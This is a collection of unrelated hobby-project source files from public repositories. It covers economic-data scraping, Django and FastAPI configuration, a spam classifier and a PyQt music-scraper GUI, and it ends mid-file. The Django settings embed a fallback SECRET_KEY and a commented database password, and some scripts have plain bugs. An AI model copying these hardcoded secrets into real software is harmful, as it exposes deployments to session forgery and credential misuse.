#Function\n\t\n\t\"\"\"awesome module for adding parameters to the classes in your script\n\t\"\"\"\n\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--giantbomb-api-key', required = True, \n\t\t\t\t\t\thelp = 'API Key provided by Giantbomb.com')\n\tparser.add_argument('--cpi-file',\n\t\t\t\t\t\tdefault = os.path.join(os.path.dirname(__file__),\n\t\t\t\t\t\t\t\t\t\t\t'CPIAUSCL.txt'),\n\t\t\t\t\t\t\t\t\t\t\thelp = 'Path to file containt the CPI data')\n\tparser.add_argument('--cpi-data-url', default = CPI_DATA_URL,\n\t\t\t\t\t\thelp = 'URL which should be used as CPI data source')\n\tparser.add_argument('--debug', default = False, action = 'store_true',\n\t\t\t\t\t\thelp = 'debug')\n\tparser.add_argument('--csv-file', help = 'Path to CSV file for output')\n\tparser.add_argument('--plot-file', help = 'Path to PNG file for output')\n\tparser.add_argument('--limit', type = int, help = \"Number of recent platforms to be considered\")\n\topts = parser.parse_args()\n\n\tif not (opts.plot_file or opts.csv_file):\n\t\t\tparser.error(\"You have to specify either a --csv-file or --plot-file\")\n\treturn opts\n\ndef main():\n\n\t\"\"\"this function handles the logic of the script\"\"\"\n\n\topts = parse_args()\n\n\tif opts.debug:\n\t\tlogging.basicConfig(level = logging.DEBUG)\n\telse:\n\t\tlogging.basicConfig(level = logging.INFO)\n\n\tcpi_data = CPIData()\n\tgb_api = GiantbombAPI(opts.giantbomb_api_key)\n\n\tif os.path.exists(opts.cpi_file):\n\t\twith open(opts.cpi_file) as fp:\n\t\t\tcpi_data.load_from_file(fp)\n\telse:\n\t\tcpi_data.load_from_url(opts.cpi_data_url, save_as_file = opts.cpi_file)\n\n\tplatforms = []\n\tcounter = 0\n\n\tfor platform in gb_api.get_Plaforms(sort = 'release_date:decs',\n\t\t\t\t\t\t\t\t\t\tfield_list = ['release_date',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t'original_price', 'name',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t'abbreviation']):\n\t\tif not is_valid_dataset(platform):\n\t\t\tcontinue\n\n\t\tyear = int(platform['release_date'].split('-')[0])\n\t\tprice = platform['original_price']\n\t\tadjusted_price = cpi_data.get_adjusted_price(price,year)\n\t\tplatform['year'] = year\n\t\tplatform['original_price'] = price\n\t\tplatform['adjusted_price'] = adjusted_price\n\t\tplatforms.append(platform)\n\n\t\tif opts.limit is not None and counter + 1 >= opts.limit:\n\t\t\tbreak\n\t\tcounter += 1\n\n\tif opts.plot_file:\n\t\tgenerate_plot(platform, opts.plot_file)\n\tif opts.csv_file:\n\t\tgenerate_csv(platform, opts.csv_file)\n\nif __name__ == '__main__':\n\tmain()","repo_name":"Stiefan/DataAnalysis","sub_path":"APIcalls/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"905017766","text":"\"\"\"\nDjango settings for table_tennis project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/dev/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/dev/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nimport dj_database_url\n\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/dev/howto/deployment/checklist/\n\nALLOWED_HOSTS = ['.herokuapp.com', ]\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'table_tennis',\n 'gunicorn',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nTEMPLATE_DIRS = (\n os.path.join(BASE_DIR, 'templates/'),\n)\n\nROOT_URLCONF = 'table_tennis.urls'\n\nWSGI_APPLICATION = 'table_tennis.wsgi.application'\n\n# Internationalization\n# https://docs.djangoproject.com/en/dev/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nDATE_FORMAT = 'd-m-Y'\n\nDATE_INPUT_FORMATS = (\n '%Y-%m-%d', '%d-%m-%Y', '%m/%d/%Y', '%m/%d/%y', # '2006-10-25', '25-10-2006', '10/25/2006', '10/25/06'\n '%b %d %Y', '%b %d, %Y', # 'Oct 25 2006', 'Oct 25, 2006'\n '%d %b %Y', '%d %b, %Y', # '25 Oct 2006', '25 Oct, 2006'\n '%B %d %Y', '%B %d, %Y', # 'October 25 2006', 'October 25, 2006'\n '%d %B %Y', '%d %B, %Y', # '25 October 2006', '25 October, 2006'\n)\n\nUSE_I18N = True\n\nUSE_L10N = False\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/dev/howto/static-files/\n\nSECRET_KEY = os.environ.get('SECRET_KEY', '*-t&u2*@dg%nxr15)uno%8&=%8cxrw2z9xdk6##*t^0ti_7-$y')\n\nSTATIC_ROOT = 'staticfiles'\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'static'),\n)\n\nfrom django.contrib.messages import constants as message_constants\n\n\nMESSAGE_TAGS = {\n message_constants.INFO: '',\n message_constants.SUCCESS: 'uk-alert-success',\n message_constants.WARNING: 'uk-alert-warning',\n message_constants.ERROR: 'uk-alert-danger',\n}\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'table_tennis',\n }\n}\n\n# DATABASES = {\n# 'default': {\n# 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n# 'NAME': 'table_tennis',\n# 'USER': 'postgres',\n# 'PASSWORD': 'asdasd',\n# 'HOST': 'localhost',\n# 'PORT': '5432',\n# }\n# }\n\nDATABASES['default'] = dj_database_url.config()\n\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n","repo_name":"wlansu/pl-table-tennis","sub_path":"table_tennis/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13301957922","text":"from urllib.request import urlopen\r\nimport matplotlib.pyplot as plt\r\nimport pandas\r\nimport quandl\r\nimport time\r\nimport datetime\r\n#from functools import reduce\r\n\r\ntime.sleep(60)\r\n\r\ndef add_one_month(t):\r\n \"\"\"Return a `datetime.date` or `datetime.datetime` (as given) that is\r\n one month earlier.\r\n\r\n Note that the resultant day of the month might change if the following\r\n month has fewer days:\r\n\r\n >>> add_one_month(datetime.date(2010, 1, 31))\r\n datetime.date(2010, 2, 28)\r\n \"\"\"\r\n import datetime\r\n one_day = datetime.timedelta(days=1)\r\n one_month_later = t + one_day\r\n while one_month_later.month == t.month: # advance to start of next month\r\n one_month_later += one_day\r\n target_month = one_month_later.month\r\n while one_month_later.day < t.day: # advance to appropriate day\r\n one_month_later += one_day\r\n if one_month_later.month != target_month: # gone too far\r\n one_month_later -= one_day\r\n break\r\n return one_month_later\r\n\r\n\r\n\r\n#https://www.quandl.com/data/FRED/GDP-Gross-Domestic-Product (QUARTERLY) (GDP)\r\n#GDP\r\n#gdpdata = quandl.get(\"FRED/GDP\", start_date=\"2001-12-31\", end_date=\"2005-12-31\")\r\ngdpdata = quandl.get(\"FRED/GDP\")\r\nprint(type(gdpdata))\r\nprint(gdpdata.shape)\r\nprint(gdpdata.head())\r\n\r\n#C:\\Users\\vivekm\\PycharmProjects\\tests1\r\ngdpdata.to_csv(\"inputgdpdata\", sep=\",\", header=False)\r\n\r\nfilename = 'inputgdpdata'\r\nlist = []\r\nl = []\r\nnewlist = []\r\nf = open(\"newgdp.csv\", 'w')\r\nfile = open(filename, 'r')\r\n\r\nfor line in file:\r\n line = line.strip('\\n')\r\n\r\n l.append(line)\r\n\r\nfor i in l:\r\n list.append(i)\r\nlength = len(list)\r\n\r\nnewlist.append(list[0])\r\n\r\nfor i in range(0,length-1):\r\n vnextitem = (list[i+1].split(\",\"))\r\n vcurrentitem = (list[i].split(\",\"))\r\n\r\n diff = float(vnextitem[1]) - float(vcurrentitem[1])\r\n a = diff / 3.0\r\n b = float(vcurrentitem[1]) + a\r\n c = float(vcurrentitem[1]) + 2*a\r\n\r\n mydate=datetime.datetime.strptime(vcurrentitem[0], '%Y-%m-%d').date()\r\n x=add_one_month(mydate)\r\n y=add_one_month(x)\r\n\r\n newlist.append(x.strftime('%Y-%m-%d')+\",\"+str(b))\r\n newlist.append(y.strftime('%Y-%m-%d') + \",\" + str(c))\r\n newlist.append(list[i+1])\r\n i = i+1\r\n\r\nfor i in newlist:\r\n f.writelines(str(i)+\"\\n\")\r\nfingdpdata = pandas.read_csv(\"newgdp.csv\",names=['Date','gdp'])\r\nprint(type(fingdpdata))\r\nprint(fingdpdata.head())\r\nprint(fingdpdata.shape)\r\n\r\n#plt.xlabel('Year')\r\n#plt.xlabel('Date')\r\n#plt.ylabel('Value')\r\n#plt.legend().set_visible(False)\r\n#plt.show()\r\n#ndf = fingdpdata.merge(finulcbsdata,on='date')\r\ntime.sleep(60)\r\n\r\n#https://www.quandl.com/data/FRED/ULCBS-Business-Sector-Unit-Labor-Cost Employment Cost Index (QUARTERLY) (UNL)\r\nulcbsdata = quandl.get(\"FRED/ULCBS\")\r\nprint(type(ulcbsdata))\r\nprint(ulcbsdata.head())\r\nprint(ulcbsdata.shape)\r\n\r\nulcbsdata.to_csv(\"inputuldata\", sep=\",\", header=False)\r\n\r\nfilename = 'inputuldata'\r\nlist = []\r\nl = []\r\nnewlist = []\r\nf = open(\"newul.csv\", 'w')\r\nfile = open(filename, 'r')\r\n\r\nfor line in file:\r\n line = line.strip('\\n')\r\n l.append(line)\r\n\r\nfor i in l:\r\n list.append(i)\r\nlength = len(list)\r\n\r\nnewlist.append(list[0])\r\n\r\nfor i in range(0,length-1):\r\n vnextitem = (list[i+1].split(\",\"))\r\n vcurrentitem = (list[i].split(\",\"))\r\n\r\n diff = float(vnextitem[1]) - float(vcurrentitem[1])\r\n a = diff / 3.0\r\n b = float(vcurrentitem[1]) + a\r\n c = float(vcurrentitem[1]) + 2*a\r\n\r\n mydate=datetime.datetime.strptime(vcurrentitem[0], '%Y-%m-%d').date()\r\n x=add_one_month(mydate)\r\n y=add_one_month(x)\r\n\r\n #newlist.append(list[i])\r\n newlist.append(x.strftime('%Y-%m-%d')+\",\"+str(b))\r\n newlist.append(y.strftime('%Y-%m-%d') + \",\" + str(c))\r\n newlist.append(list[i+1])\r\n i = i+1\r\n\r\nfor i in newlist:\r\n f.writelines(str(i)+\"\\n\")\r\nfinulcbsdata = pandas.read_csv(\"newul.csv\",names=['Date','ulc'])\r\nprint(type(finulcbsdata))\r\nprint(finulcbsdata.head())\r\nprint(finulcbsdata.shape)\r\n\r\ndf1 = fingdpdata.merge(finulcbsdata,on='Date')\r\ntime.sleep(60)\r\n\r\n\r\n#https://fred.stlouisfed.org/series/INTDSRUSM193N#0 Interest Rate (IR)\r\nurlint = \"https://fred.stlouisfed.org/graph/fredgraph.csv?chart_type=line&recession_bars=on&log_scales=&bgcolor=%23e1e9f0&graph_bgcolor=%23ffffff&fo=Open+Sans&ts=12&tts=12&txtcolor=%23444444&show_legend=yes&show_axis_titles=yes&drp=0&cosd=1950-01-01&coed=2017-04-01&height=450&stacking=&range=&mode=fred&id=INTDSRUSM193N&transformation=lin&nd=1950-01-01&ost=-99999&oet=99999&lsv=&lev=&mma=0&fml=a&fgst=lin&fgsnd=2009-06-01&fq=Monthly&fam=avg&vintage_date=&revision_date=&line_color=%234572a7&line_style=solid&lw=2&scale=left&mark_type=none&mw=2&width=1168\"\r\nintcsv = urlopen(urlint)\r\nintdata = pandas.read_csv(intcsv, index_col=0, parse_dates=True)\r\nfinintdata = intdata.reset_index()\r\nfinintdata1 = finintdata.rename(columns={\"INTDSRUSM193N\": \"ir\", \"DATE\" : \"Date\"})\r\nprint(finintdata1.head())\r\n\r\n\r\ndf2 = df1.merge(finintdata1,on='Date')\r\ntime.sleep(60)\r\n\r\n#https://www.quandl.com/data/FRED/CPIAUCSL-Consumer-Price-Index-for-All-Urban-Consumers-All-Items (CPI)\r\ncpidata = quandl.get(\"FRED/CPIAUCSL\")\r\nfincpidata = cpidata.reset_index()\r\nfincpidata1 = fincpidata.rename(columns={\"Value\": \"cpi\"})\r\nprint(fincpidata1.head())\r\n#dfs = [gdpdata, cpidata]\r\n#df_final = reduce(lambda left,right: pd.merge(left,right,on='Date'), dfs)\r\n#print(df_final.head())\r\n\r\n#ndf = df1.merge(df2,on='Date').merge(df3,on='Date')\r\n#ndf = df1.merge(df2,on='Date')\r\n#print(type(ndf))\r\n#print(ndf.head())\r\n#print(ndf.shape)\r\n\r\ndf3 = df2.merge(fincpidata1,on='Date')\r\ntime.sleep(60)\r\n\r\n\r\n\r\n#https://www.quandl.com/data/FRED/HSN1F-New-One-Family-Houses-Sold-United-States (NHS)\r\n#New Home Sales (NHS)\r\nnhsdata = quandl.get(\"FRED/HSN1F\")\r\nfinnhsdata = nhsdata.reset_index()\r\nfinnhsdata1 = finnhsdata.rename(columns={\"Value\": \"nhs\"})\r\nprint(finnhsdata1.head())\r\n\r\ndf4 = df3.merge(finnhsdata1,on='Date')\r\ntime.sleep(60)\r\n#https://www.quandl.com/data/FRED/TCU-Capacity-Utilization-Total-Industry Capacity Utilization (CU)\r\ntcudata= quandl.get(\"FRED/TCU\")\r\nfintcudata = tcudata.reset_index()\r\nfintcudata1 = fintcudata.rename(columns={\"Value\": \"cu\"})\r\nprint(fintcudata1.head())\r\n\r\ndf5 = df4.merge(fintcudata1,on='Date')\r\ntime.sleep(60)\r\n\r\n#https://www.census.gov/retail/marts/historic_releases.html Retail Sales (RS)\r\nrsafsdata= quandl.get(\"FRED/RSAFS\")\r\nfinrsafsdata = rsafsdata.reset_index()\r\nfinrsafsdata1 = finrsafsdata.rename(columns={\"Value\": \"rs\"})\r\nprint(finrsafsdata1.head())\r\n\r\ndf6 = df5.merge(finrsafsdata1,on='Date')\r\ntime.sleep(60)\r\n\r\n#https://www.quandl.com/data/ISM/MAN_PMI-PMI-Composite-Index NAPM Index (NAPM)\r\npmidata = quandl.get(\"ISM/MAN_PMI\")\r\nfinpmidata = pmidata.reset_index()\r\nfinpmidata1 = finpmidata.rename(columns={\"Value\": \"napm\"})\r\nprint(finpmidata1.head())\r\n\r\n\r\n\r\ndf7 = df6.merge(finpmidata1,on='Date')\r\ntime.sleep(60)\r\n#https://www.quandl.com/data/FRED/PAYEMS-All-Employees-Total-Nonfarm-Payrolls (NFP)\r\n#Non Farm Payrolls\r\nnfpdata = quandl.get(\"FRED/PAYEMS\")\r\nfinnfpdata = nfpdata.reset_index()\r\nfinnfpdata1 = finnfpdata.rename(columns={\"Value\": \"nfp\"})\r\nprint(finnfpdata1.head())\r\n\r\ndf8 = df7.merge(finnfpdata1,on='Date')\r\ntime.sleep(60)\r\n\r\n#https://www.quandl.com/data/FRED/UNRATE-Civilian-Unemployment-Rate Unemployment Rate (UR)\r\nurdata = quandl.get(\"FRED/UNRATE\")\r\nfinurdata = urdata.reset_index()\r\nfinurdata1 = finurdata.rename(columns={\"Value\": \"ur\"})\r\nprint(finurdata1.head())\r\n\r\ndf9 = df8.merge(finurdata1,on='Date')\r\ntime.sleep(60)\r\n\r\n#https://www.quandl.com/data/OECD/KEI_CSCICP02_USA_ST_M-Consumer-confidence-indicator-s-a-United-States-Level-ratio-or-index-Monthly (QUARTERLY) (CCI)\r\n#Consumer Confidence Index\r\nccidata = quandl.get(\"OECD/KEI_CSCICP02_USA_ST_M\")\r\nfinccidata = ccidata.rename(columns={\"Value\": \"cci\"})\r\nprint(finccidata.head())\r\n\r\ndffinal = df9.merge(finccidata,on='Date')\r\ndffinal.to_csv(\"FinalDataSet\", sep=\",\", header=True)","repo_name":"purvimisal/InterestRatePrediction","sub_path":"pipelining/data1.py","file_name":"data1.py","file_ext":"py","file_size_in_byte":7940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41096057523","text":"from sys import argv\r\nfrom util import convertDictToList,sortBySecond,convertListOfListToCsv\r\n\r\nplayers = open(argv[1]).read().split('\\n')\r\nscore_stats ={}\r\n\r\ndef incrementPlayerScore(player):\r\n if player not in score_stats:\r\n score_stats[player] = 0\r\n score_stats[player] += 1\r\n\r\nfor player1 in players:\r\n for player2 in players:\r\n if player1 < player2:\r\n rows = open('output/first_win_faceoff/first_win_faceoff_%s_%s.csv'%(player1,player2)).read().split('\\n')\r\n score_diff = 0\r\n for row in rows:\r\n if row == '':\r\n continue\r\n variant,num_players,attempts1,ignore1,attempts2,ignore2 = row.split(',')\r\n score_diff += (1.0/int(attempts1) - 1.0/int(attempts2))\r\n if score_diff > 0:\r\n incrementPlayerScore(player1)\r\n else:\r\n incrementPlayerScore(player2)\r\n\r\nscore_stats = convertDictToList(score_stats)\r\nscore_stats = sortBySecond(score_stats)\r\n\r\noutput = open('output/player_score_summary1.csv', 'w')\r\noutput.write(convertListOfListToCsv(score_stats))\r\noutput.close()","repo_name":"Lel0uch-H/hanab-stats","sub_path":"player_score_summary1.py","file_name":"player_score_summary1.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36634348108","text":"# -*- coding: utf-8 -*-\nfrom model.group import Group\nimport random\n\ndef test_delete_group(app):\n if app.group.count() == 0:\n app.group.create(Group(\"test\"))\n old_groups = app.group.get_group_list()\n index = random.randrange(len(old_groups))\n app.group.delete_random_group(index)\n new_groups = app.group.get_group_list()\n assert len(new_groups)+1 == len(old_groups)\n old_groups[index: index+1] = []\n assert old_groups == new_groups\n\n","repo_name":"agnieszkazm/python_for_tests","sub_path":"test/test_delete_group.py","file_name":"test_delete_group.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22050599354","text":"from typing import Union\nfrom fastapi import FastAPI\nfrom .routers import routers\nfrom dotenv import dotenv_values\nfrom pymongo import MongoClient\n\nconfig = dotenv_values(\".env\")\napp = FastAPI()\n\n@app.on_event(\"startup\")\ndef startup_db_client():\n app.mongodb_client = MongoClient(config[\"MONGODB_URI\"])\n app.database = app.mongodb_client[config[\"DB_NAME\"]]\n\n@app.on_event(\"shutdown\")\ndef shutdown_db_client():\n app.mongodb_client.close()\n\nfor router in routers:\n app.include_router(\n router=router['router'],\n prefix=router['prefix'],\n tags=router['tags']\n )\n\n# @app.get(\"/\")\n# def read_root():\n# return {\"Hello\": \"World\"}\n\n\n# @app.get(\"/items/{item_id}\")\n# def read_item(item_id: int, q: Union[str, None] = None):\n# return {\"item_id\": item_id, \"q\": q}\n","repo_name":"emran-jatri/wtn-fastapi","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28175384956","text":"import os\nfrom pymongo import MongoClient\nfrom datetime import datetime\n\n#===============================================\nclass MongoConnector:\n def __init__(self, data_path, host = None, port = None):\n self.mPath = data_path\n if host is None:\n host = \"localhost\"\n if port is None:\n port = 27017\n self.mMongo = MongoClient(host, port)\n self.mDSAgents = dict()\n self.mPlainAgents = dict()\n\n def close(self):\n self.mMongo.close()\n\n def getDSAgent(self, name, kind):\n if name not in self.mDSAgents:\n self.mDSAgents[name] = MongoDSAgent(self,\n self.mMongo[self.mPath][name], name)\n return self.mDSAgents[name]\n\n def getPlainAgent(self, name):\n if name not in self.mPlainAgents:\n self.mPlainAgents[name] = self.mMongo[self.mPath][name]\n return self.mPlainAgents[name]\n\n def getDB(self, db_path):\n return self.mMongo[db_path]\n\n#===============================================\nclass MongoDSAgent:\n def __init__(self, connector, agent, name):\n self.mConnector = connector\n self.mAgent = agent\n self.mName = name\n\n def getName(self):\n return self.mName\n\n def getAgentKind(self):\n assert False\n\n #===== CreationDate\n def getCreationDate(self):\n it = self.mAgent.find_one({\"_tp\": \"dsinfo\"})\n if it is not None:\n return it.get(\"upd-time\")\n return None\n\n def updateCreationDate(self, time_label = None, ajson_fname = None):\n to_update = {\"upd-time\": (time_label if time_label is not None\n else datetime.now().isoformat())}\n if ajson_fname is not None:\n ajson_stat = os.stat(ajson_fname)\n to_update[\"ajson-fstat\"] = [ajson_fname,\n int(ajson_stat.st_size), int(ajson_stat.st_mtime)]\n else:\n to_update[\"ajson-fstat\"] = None\n self.mAgent.update_one({\"_tp\": \"dsinfo\"}, {\"$set\": to_update},\n upsert = True)\n\n #===== Note\n def getNote(self):\n it = self.mAgent.find_one({\"_tp\": \"dsinfo\"})\n if it is not None:\n return (it.get(\"note\", \"\").strip(), it.get(\"note-time\"))\n return (\"\", None)\n\n def setNote(self, note):\n time_label = datetime.now().isoformat()\n self.mAgent.update_one({\"_tp\": \"dsinfo\"},\n {\"$set\": {\"note\": note.strip(), \"note-time\": time_label}},\n upsert = True)\n","repo_name":"ForomePlatform/anfisa","sub_path":"app/model/mongo_db.py","file_name":"mongo_db.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"9428949717","text":"import streamlit as st\r\nimport pickle\r\nimport string\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import WordNetLemmatizer\r\n\r\ntfidf = pickle.load(open('vectorizer.pkl', 'rb'))\r\nmodel = pickle.load(open('model_bnb.pkl', 'rb'))\r\n\r\ndef transform_text(text):\r\n text_lower = text.lower()\r\n text_lower_token = nltk.word_tokenize(text_lower)\r\n text_final = []\r\n\r\n for i in text_lower_token:\r\n if i.isalnum():\r\n text_final.append(i)\r\n\r\n text_all = text_final[:]\r\n text_final.clear()\r\n\r\n for i in text_all:\r\n if i not in stopwords.words('english') and i not in string.punctuation:\r\n text_final.append(i)\r\n\r\n text_new = text_final[:]\r\n text_final.clear()\r\n\r\n lemmatizer = WordNetLemmatizer()\r\n\r\n lemmatized_words = [lemmatizer.lemmatize(word) for word in text_new]\r\n\r\n return \" \".join(lemmatized_words)\r\n\r\nst.title('SMS Spam Classifier')\r\n\r\ninput_sms = st.text_area('Enter a message: ')\r\n\r\nif st.button('Predict'):\r\n\r\n\r\n # Steps\r\n # 1. Preprocess\r\n transformed_sms = transform_text(input_sms)\r\n # 2. vectorize\r\n\r\n vector_input = tfidf.transform([transformed_sms])\r\n # 3. predict\r\n\r\n result = model.predict(vector_input)[0]\r\n\r\n # 4. display result\r\n\r\n if result == 1:\r\n st.header(\"Spam\")\r\n else:\r\n st.header(\"Not Spam\")\r\n","repo_name":"Satyam24/SMS-Spam-Classifier","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"23862502487","text":"import numpy as np\n\n\ndef plot_data_distribution(df, title_col=None):\n import seaborn as sns\n import matplotlib.pyplot as plt\n\n df['doc_len'] = df[title_col].apply(lambda words: len(words.split()))\n max_seq_len = np.round(df['doc_len'].mean() + df['doc_len'].std()).astype(int)\n sns.distplot(df['doc_len'], hist=True, kde=True, color='b', label='doc len')\n plt.axvline(x=max_seq_len, color='k', linestyle='--', label='max len')\n plt.title('plot length')\n plt.legend()\n plt.show()\n\n\ndef fetch_course_info(dataframe_idx, df, title_col=None, desc_col=None):\n info = df.iloc[dataframe_idx]\n meta_dict = {title_col: info[title_col], desc_col: info[desc_col]}\n return meta_dict\n\n\ndef run_query_tests(model, desc_col=None, title_col=None):\n print(\"Running query tests\")\n query_test('Python Entwicklung', model, desc_col=desc_col, title_col=title_col)\n query_test('DevOps Azure CI/CD', model, desc_col=desc_col, title_col=title_col)\n\n\ndef query_test(query, model, desc_col=None, title_col=None):\n results = model.search(query, top_k=5, desc_col=desc_col, title_col=title_col)\n\n print(\"\\n\")\n for result in results:\n print('\\t', result)\n","repo_name":"amrohendawi/roberta-t5-faiss-semantic-search","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"3499016882","text":"# -*- coding: UTF-8 -*-\n\nimport datetime\nimport multiprocessing\nimport sys\nimport os\nimport threading\nimport time\n\nimport src.ui.ui\nimport PyQt5\nimport src.lyric_by_music\nimport src.music_by_songsall\nimport src.word_cloud_by_artist\nimport src.word_cloud_by_lyric\nimport src.searchLyric\n#\n#\n# if hasattr(sys, 'frozen'):\n#\n# os.environ['PATH'] = sys._MEIPASS + \";\" + os.environ['PATH']\n\nfrom src.ui.ui import Ui_MainWindow\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QHeaderView, QAbstractItemView, QTableWidgetItem\nfrom PyQt5 import QtCore, QtGui\nfrom PyQt5.QtCore import QEventLoop, QTimer, Qt\nfrom PyQt5.QtGui import QIcon, QPixmap, QCursor\n\nimport src.sql_sqlite as sql\nfrom src.lyric_by_music import lyricSpider\nfrom src.music_by_songsall import musicSpider\nfrom src.playlist_by_user import playlistSpider\nfrom src.word_cloud_by_artist import cloudArtist\nfrom src.word_cloud_by_lyric import cloudLyric\nfrom src.searchLyric import searchLyr\n\n\n# pyuic5 -o ui.py frame2.ui\n# pyrcc5 -o icon_rc.py icon.qrc\n# import src.ui.icon_rc\n\nclass EmittingStr(QtCore.QObject):\n # 定义一个发送str的信号\n textWritten = QtCore.pyqtSignal(str)\n\n def write(self, text):\n self.textWritten.emit(str(text))\n loop = QEventLoop()\n QTimer.singleShot(100, loop.quit)\n loop.exec_()\n\n\nclass MyMainForm(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super(MyMainForm, self).__init__(parent)\n # 关闭窗口边框\n self.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n # 透明窗口\n self.setAttribute(Qt.WA_TranslucentBackground)\n self.setupUi(self)\n self.setWindowTitle('163MusicSA')\n self.setWindowIcon(QIcon(r'./data/icon/icon.png'))\n # QApplication.setStyle('Fusion')\n # 窗口风格Fusion类型\n self.th = None\n\n self.musicSpider_Button.clicked.connect(self.musicSpider)\n self.lyricSpider_Button.clicked.connect(self.lyricSpider)\n\n self.cloudLyric_Button.clicked.connect(self.cloudLyric)\n self.cloudArtist_Button.clicked.connect(self.cloudArtist)\n self.shapeFile()\n self.fontFile()\n self.file_Button.clicked.connect(self.open_file)\n self.shapefile_Button.clicked.connect(self.open_Shapefile)\n self.fontfile_Button.clicked.connect(self.open_Fontfile)\n self.min_Button.clicked.connect(self.showMinimized)\n self.close_Button.clicked.connect(self.close)\n self.meButton.clicked.connect(self.meBtn)\n\n self.music_table.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n self.music_table.horizontalHeader().setSectionResizeMode(0, QHeaderView.Interactive)\n # self.music_table.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.music_table.setColumnCount(3)\n self.tableinf_Button.clicked.connect(self.getinf)\n\n self.music_table_2.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n self.music_table_2.horizontalHeader().setSectionResizeMode(0, QHeaderView.Interactive)\n # self.music_table_2.setEditTriggers(QAbstractItemView.NoEditTriggers)\n self.music_table_2.setColumnCount(2)\n self.tableinf_Button_2.clicked.connect(self.getinf_2)\n\n self.search_lyric.clicked.connect(self.searchlyr)\n\n self.clear_Button.clicked.connect(self.clear)\n self.clear_Button_2.clicked.connect(self.clear2)\n self.clear_Button_3.clicked.connect(self.clear3)\n\n sys.stdout = EmittingStr(textWritten=self.outputWritten)\n sys.stderr = EmittingStr(textWritten=self.outputWritten)\n\n # 任意拖拽\n def mousePressEvent(self, QMouseEvent):\n if QMouseEvent.button() == Qt.LeftButton:\n self.flag = True\n # 获取鼠标相对窗口的位置\n self.m_Position = QMouseEvent.globalPos() - self.pos()\n QMouseEvent.accept()\n # 更改鼠标图标\n # self.setCursor(QCursor(Qt.OpenHandCursor))\n\n def mouseMoveEvent(self, QMouseEvent):\n if Qt.LeftButton and self.flag:\n # 更改窗口位置\n self.move(QMouseEvent.globalPos() - self.m_Position)\n QMouseEvent.accept()\n\n def mouseReleaseEvent(self, QMouseEvent):\n self.flag = False\n self.setCursor(QCursor(Qt.ArrowCursor))\n\n def outputWritten(self, text):\n cursor = self.textBrowser.textCursor()\n cursor.movePosition(QtGui.QTextCursor.End)\n cursor.insertText(text)\n self.textBrowser.setTextCursor(cursor)\n self.textBrowser.ensureCursorVisible()\n\n def musicSpider(self):\n self.th = threading.Thread(target=self.ms)\n # 设置线程为守护线程,防止退出主线程时,子线程仍在运行\n self.th.setDaemon(True)\n # 新线程启动\n self.th.start()\n\n def ms(self):\n musicSpider(self.user_idEdit.text())\n\n def lyricSpider(self):\n self.th = threading.Thread(target=self.ls)\n # 设置线程为守护线程,防止退出主线程时,子线程仍在运行\n self.th.setDaemon(True)\n # 新线程启动\n self.th.start()\n\n def ls(self):\n lyricSpider(self.user_idEdit.text())\n\n\n def cloudLyric(self):\n self.th = threading.Thread(target=self.lc)\n # 